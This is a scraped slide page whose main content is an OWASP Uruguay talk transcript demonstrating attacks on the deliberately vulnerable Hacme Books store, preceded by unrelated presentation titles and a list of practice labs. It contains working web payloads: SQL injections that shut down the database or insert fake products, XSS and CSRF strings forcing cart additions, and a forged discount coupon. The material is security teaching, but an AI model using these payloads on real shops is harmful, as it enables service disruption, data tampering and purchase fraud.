de Hacking a un eCommerce

Slides:

Advertisements

Presentaciones similares

Presentación – Web Attack

Advertisements

1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.

MEXICAN CUSTOMS UPDATE

1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.

Hoy vamos a .. preparar un texto (para escribir or decir)

Curso de Java “Java para Web” Rogelio Ferreira Escutia.

ESPAÑOL UNO Los Adjetivos Demonstrativos (Demonstrative Adjectives)

Asynchronous JavaScript and XML. Esta clase sirve para ser utilizado cuando lo único que queremos hacer es actualizar cierta parte de un sitio Web continuamente.

Possesives Test Spanish 1. Get your paper ready. Write your name except for Isai. Write the date. Write your class period. Number your paper 1-16.

SER and ESTAR Capítulo 2A Study guide / Worksheet / Powerpoint

Game Cluedo: How to Play 1.Your group should have the 21 cards containing 6 cards of suspects, 9 rooms and 6 weapons, a tally card for each member and.

Query Direcciones SELECT Nombre, Apellido, Ciudad FROM Direcciones;

Esquema de Mapeo de Base de Datos Relacionales a Objetos

CI-2413 Desarrollo de Aplicaciones para Internet

Spatial Database Bases de Datos Espaciales MOTORES COMERCIALES Oracle Spatial.

Bases de Datos Espaciales SPATIAL QUERY LANGUAGES

Final Project Instructions Due Mon/Tues, April 11 & 12 Final project should be a power point presentation with photos or a poster with photos/labels. Descriptions.

Trabajo con subconsultas

Procedimientos para agrupar y resumir datos

SQL Server 2005 ADO.NET Javier Fernández Rodríguez Noviembre 2005, Sevilla Javier Fernández Rodríguez Noviembre 2005, Sevilla.

SABER Y CONOCER The verbs saber and conocer also have an irregular YO form. Both of these verbs mean to know. Saber is used to express knowledge of simple.

ANTE TODO In Spanish, as in English, the object of a preposition is the noun or pronoun that follows a preposition. Observe the following diagram. PREPOSITION.

Jakarta Tomcat (Contenedor de servlets/jsps)

YouThe person you are phoning Hello (formal). My name is….. and I work for the company Smoothie Drinks. Ah sí, ¿en qué puedo ayudarle? My boss, Mr. Watson.

ADMINISTRACION DE REDES SECUENCIA DE COMANDOS EN SITIOS CRUZADOS(XSS)

Errores comunes al desarrollar websites

¿Qué hora es? Telling Time en Español Sra Spampinato.

About This Book Second Graders read The Book of Bad Ideas by Laura Huliska-Beith. They then created their own Bad Ideas. They drafted their text and.

Libro p Vocabulario y gramática en contexto.

Entender qu é es cloud computing Cloud computing seg ú n Microsoft: Azure.NET Services SQL Services Live Services.

YII (Yes It Is!) – Php Framework

Seminario de Lenguajes A – Opción Ada

Miembro de OWASP capítulo Aguascalientes

Desarrollo de sitios web con PHP y MySQL Tema 7: Seguridad José Mariano González Romano

M.I. María Luisa González Ramírez Servlets y JSP.

Please do the following: 1.Measure an arms length of yarn of the color you like and cut it. (arms length goes from finger tip of one had to fingertip of.

Tema 3 J2EE Java Database Connectivity Temas Selectos de Cómputo Grupo 912.

Appollon 1 Disclaimer The terms and conditions are indicative and may change with market fluctuations. Société Générale assumes no fiduciary responsibility.

The OWASP Foundation OWASP AppSec Aguascalientes 2010 Guía de Desarrollo Seguro Francisco Aldrete Miembro de OWASP capítulo Aguascalientes.

OWASP - A6 Open Web Application Security Project Riesgo por: Configuración Defectuosa de Seguridad Guillermo David Vélez Álvarez C.C. 71' 763,346.

Repaso (2) Escribir una carta (2)

ECOM-6030 PASOS PARA LA INSTALACIÓN DE EASYPHP Prof. Nelliud D. Torres © - Derechos Reservados.

Title. TITLE Title.

To insert this design into another PowerPoint presentation, highlight the image, then under the Home tab in your PowerPoint ribbon, click on Copy. Now.

Go to cessarsc9.wixsite.com/clasedeespanol Click in this icon to see the presentation.

LOS DIFERENTES LENGUAJES DE PROGRAMACION PARA LA WEB

If you feel that the resources that I have created have helped you save time and/or money, please consider supporting the work that I do by doing your.

MY PROJECT THE HISTORY OF THALIA.

Aspectos de Seguridad en paginas Web

To insert audio you need to be on that slide

Ataques XSS y CSRF CI-2413 Desarrollo de Aplicaciones para Internet.

Transcripción de la presentación:

de Hacking a un eCommerce Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez, QSA, CISSP OWASP URUGUAY

OWASP Vulnerable Web Applications Directory Project Get out of Jail! Offline Virtual Machines (VMs) or ISO images Online/Live Offline: The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc). The BodgeIt Store (Java): http://code.google.com/p/bodgeit/ (download) OWASP Bricks (PHP): http://sechow.com/bricks/index.html (download & docs) The ButterFly Security Project (PHP): http://sourceforge.net/projects/thebutterflytmp/ (download) bWAPP - an extremely buggy web application! (PHP): http://www.itsecgames.com (download) (docs) Damn Vulnerable Web Application - DVWA (PHP): http://www.dvwa.co.uk (download) Damn Vulnerable Web Services - DVWS (PHP): http://dvws.secureideas.net (download) OWASP Hackademic Challenges Project (PHP):https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project (download) Google Gruyere (Python): http://google-gruyere.appspot.com (download) Hacme Bank (.NET): http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx (download) Hacme Books (Java): http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx (download) Hacme Casino (Ruby on Rails): http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx(download) Hacme Shipping (ColdFusion): http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx (download) Hacme Travel (C++): http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx (download) OWASP Insecure Web App Project (Java):https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project (download -orphaned) Mutillidae (PHP): http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 (download) OWASP .NET Goat (C#): https://owasp.codeplex.com (download) Peruggia (PHP): http://peruggia.sourceforge.net (download) Puzzlemall (Java): https://code.google.com/p/puzzlemall/ (download) (docs) Stanford Securibench (Java) & Micro: http://suif.stanford.edu/~livshits/securibench/ (download) SQLI-labs (PHP): https://github.com/Audi-1/sqli-labs (download) (blog) SQLol (PHP): https://github.com/SpiderLabs/SQLol (download) OWASP Vicnum Project (Perl & PHP):https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project (download) VulnApp (.NET): http://www.nth-dimension.org.uk/blog.php?id=88 (CVS download & vulns) WackoPicko (PHP): https://github.com/adamdoupe/WackoPicko (download) (whitepaper) OWASP WebGoat (Java): https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project(download) (guide) OWASP ZAP WAVE - Web Application Vulnerability Examples (Java):http://code.google.com/p/zaproxy/downloads/list Wavsep - Web Application Vulnerability Scanner Evaluation Project (Java): https://code.google.com/p/wavsep/ (download) (docs) WIVET - Web Input Vector Extractor Teaser: https://code.google.com/p/wivet/ (download) (tests) Virtual Machines (VMs) or ISO images: The following list references preinstalled and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with. BadStore (ISO): http://www.badstore.net (download - registration required) Bee-Box (bWAPP VMware): http://sourceforge.net/projects/bwapp/files/bee-box/ OWASP BWA - Broken Web Applications Project (VMware - list):https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project (download) Drunk Admin Web Hacking Challenge (VMware): https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/ (download) Exploit.co.il Vuln Web App (VMware): http://exploit.co.il/projects/vuln-web-app/ (download) GameOver (VMware): http://sourceforge.net/projects/null-gameover/ (download) Hackxor (VMware): http://hackxor.sourceforge.net/cgi-bin/index.pl (download) (hints&tips) Hacme Bank Prebuilt VM (VMware): http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/ (download) Kioptrix4 (VMware & Hyper-V): http://www.kioptrix.com/blog/?p=604 (download) LAMPSecurity (VMware): http://sourceforge.net/projects/lampsecurity/ (download) (doc) Metasploitable (VMware): http://blog.metasploit.com/2010/05/introducing-metasploitable.html(download - torrent) (doc) Metasploitable 2 (VMware): https://community.rapid7.com/docs/DOC-1875 (download) Moth (VMware): http://www.bonsai-sec.com/en/research/moth.php (download) PentesterLab - The Exercises (ISO & PDF): https://www.pentesterlab.com/exercises/ PHDays I-Bank (VMware): http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html (download) Samurai WTF (ISO - list): http://www.samurai-wtf.org (download) Sauron (Quemu) [Spanish]: http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html (solutions) UltimateLAMP (VMware - list): http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/ (download) Virtual Hacking Lab (ZIP): http://sourceforge.net/projects/virtualhacking/ (download) Web Security Dojo (VMware, VirtualBox - list): http://www.mavensecurity.com/web_security_dojo/(download) Online/Live: The following list references online and live vulnerable web applications available on the Internet to play with. Acunetix: http://testasp.vulnweb.com (Forum - ASP) http://testaspnet.vulnweb.com (Blog - .NET) http://testphp.vulnweb.com (Art shopping - PHP) Cenzic CrackMeBank: http://crackme.cenzic.com Google Gruyere (Python): http://google-gruyere.appspot.com/start Hacking-Lab (eg. OWASP Top 10): https://www.hacking-lab.com/events/registerform.html?eventid=245 Hack.me (beta): https://hack.me HackThisSite (HTS - Basic & Realistic (web) Missions): http://www.hackthissite.org Hackxor online demo: http://hackxor.sourceforge.net/cgi-bin/index.pl#demo (algo/smurf) HP/SpiDynamics Free Bank Online: http://zero.webappsecurity.com (admin/admin) IBM/Watchfire AltoroMutual: http://demo.testfire.net (jsmith/Demo1234) NTOSpider Web Scanner Test Site: http://www.webscantest.com (testuser/testpass) OWASP Hackademic Challenges Project - Live (PHP - Joomla): http://hackademic1.teilar.gr Pentester Academy: http://pentesteracademylab.appspot.com http://goo.gl/84NfEv

HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books Hacme Casino v1.0 Hacme Shipping Hacme Travel Hacme Bank™ Android is designed to teach mobile application developers, programmers, architects and security professionals how to create secure software and evaluate their own software to identify vulnerabilities. Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Foundstone Hacme Books is a learning platform for secure software developmentFoundstone Hacme Casino™ is a learning platform for secure software development. Hacme Shipping is a web-based shipping application developed to demonstrate common web application hacking techniques. Hacme Travel is designed to create secure software.

#1 Generación de Errores

“ ’ ”

stack trace

“ ’ ” • Tipo de BD – Hypersonic SQL (org.hsqldb) • Servidor de Aplicación – Apache Tomcat • Utiliza Spring framework • Aplicación J2EE application – Java namespaces

#2 Inyección SQL (a)

Comando para hacer un halt al servidor de BD en HSQLDB : SHUTDOWN

Comando para hacer un halt al servidor de BD en HSQLDB : SHUTDOWN

select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'

select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'

#2 Inyección SQL (b)

my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --

#3 XSS (Cross-Site Scripting)

<script>alert("XSS")</script>

You should buy our latest bestseller instead of this book. <script> location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470" </script>

#4 CSRF (Cross-Site Request Forgery)

You should really consider purchasing the latest bestseller. <img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>

#5 Crypto

15 % de Descuento AEODBOBOOF 25% de Descuento BEAAABBOOF BEOABDBOOF

AEODBOBOOF BEAAABBOOF BEOABDBOOF 2511122006 2501242006 BEAAAB2006 BEOABD2006

Probar este cupón: IEODBOBOAD % Mes Día Año 15 04 20 2006 25 11 12 2006 95 04 20 2014 IE OD BO BOAD Probar este cupón: IEODBOBOAD

#6 Broken Access Control

Hacme Books http://sourceforge.net/projects/foundstone

¡Muchas gracias! mateo.martinez@owasp.org